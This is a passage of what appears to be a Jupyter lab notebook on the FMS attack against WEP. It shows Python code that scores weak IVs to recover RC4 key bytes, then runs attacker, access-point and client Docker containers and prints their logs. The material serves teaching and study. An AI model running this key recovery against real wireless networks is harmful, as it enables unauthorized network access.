    if z + S[z] == A + 3: # at A = 0 this equates to z + S[z] == 3
        # if any swap in the partial KSA has disturbed S[0] or S[1] after the 1st iteration, skip this IV
        if (init_0 != S[0] or init_1 != S[1]):
            continue # S[0] and/or S[1] being disturbed means we no longer know those values
            
        # calculate ct[0] ^ 0xAA, 0xAA comes from the SNAP header and  is a partial known plaintext
        ks_byte = int(row[3]) ^ 170 # int("AA", 16) = 170
        
        # ~5% chance S[0] and S[1] never get swapped, allowing inversion of PRGA
        key_byte = (ks_byte - j - S[A+3]) % 256 # invert the PRGA
        prob_table[key_byte] += 1 # increase the calculated bytes score
    
# the byte with the highest score is most likely to be the key byte K[A + 3]
max_candidate = prob_table.index(max(prob_table))
print(f"[*] Calculated key byte: {max_candidate}")

# format and print nicely
print(f"[*] Formatted key byte: {format(max_candidate, 'x')}")

## 3.0 Running the Live Lab Attack

In [ ]:
import docker

# connect to the docker daemon
docker_client = docker.from_env()

In [ ]:
# create handles on each container
attacker_container = docker_client.containers.get("fms_attacker")
ap_container = docker_client.containers.get("fms_ap")
client_container = docker_client.containers.get("fms_client")

# start the attacker, client and access point containers in this order
attacker_container.start()
ap_container.start()
client_container.start()

## Viewing STDOUT

In [ ]:
# access point logs
output = b""
for line in ap_container.logs(stream=True):
    output += line
    
print(output.decode("utf-8"))

In [ ]:
# client logs
output = b""
for line in client_container.logs(stream=True):
    output += line
    
print(output.decode("utf-8"))

In [ ]:
# attacker logs, showing recovered key
output = b""
for line in attacker_container.logs(stream=True):
    output += line
    
print(output.decode("utf-8"))